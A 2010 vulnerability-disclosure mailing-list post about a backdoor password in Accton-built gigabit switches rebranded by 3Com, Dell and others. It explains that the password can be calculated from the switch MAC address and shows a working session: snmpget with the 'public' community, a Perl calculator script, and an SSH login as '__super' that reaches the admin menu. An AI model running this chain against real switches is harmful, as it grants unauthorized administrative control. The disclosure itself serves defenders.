[VIM] Backdoor password in some Accton-based gigabit switches (3Com, Dell etc.)
teusink at fox-it.com
Thu Sep 2 11:20:55 CDT 2010
Hi VIM readers,
On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent . Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug...
The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable, but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch.
The backdoor password can be calculated if you have the switch MAC-address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don't know the MAC-address but can guess the OUI, brute forcing the password is probably feasible as well. A perl script (accton.pl) to calculate the password from the MAC address is available at .
I'm hoping as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks.
A sample SSH session with my 3Com 3812, running the latest available firmware (2.00):
$ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90
$ perl accton.pl 0:d:54:9d:1b:90
$ ssh __super at 192.168.104.99
__super at 192.168.104.99's password: !F!RELUO
Menu options: -------3Com SuperStack 3 Switch 3812 12-port---------------------
bridge - Administer bridge-wide parameters
feature - Administer system features
gettingStarted - Basic device configuration
logout - Logout of the Command Line Interface
physicalInterface - Administer physical interfaces
protocol - Administer protocols
security - Administer security
system - Administer system-level functions
trafficManagement - Administer traffic management
Type ? for help.
Select menu option:
 HAR2009 talk https://har2009.org/program/events/103.en.html
 HAR2009 slides http://www.vettebak.nl/hak/
 Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor
 Exploit calculator http://www.vettebak.nl/hak/accton.pl
More information about the VIM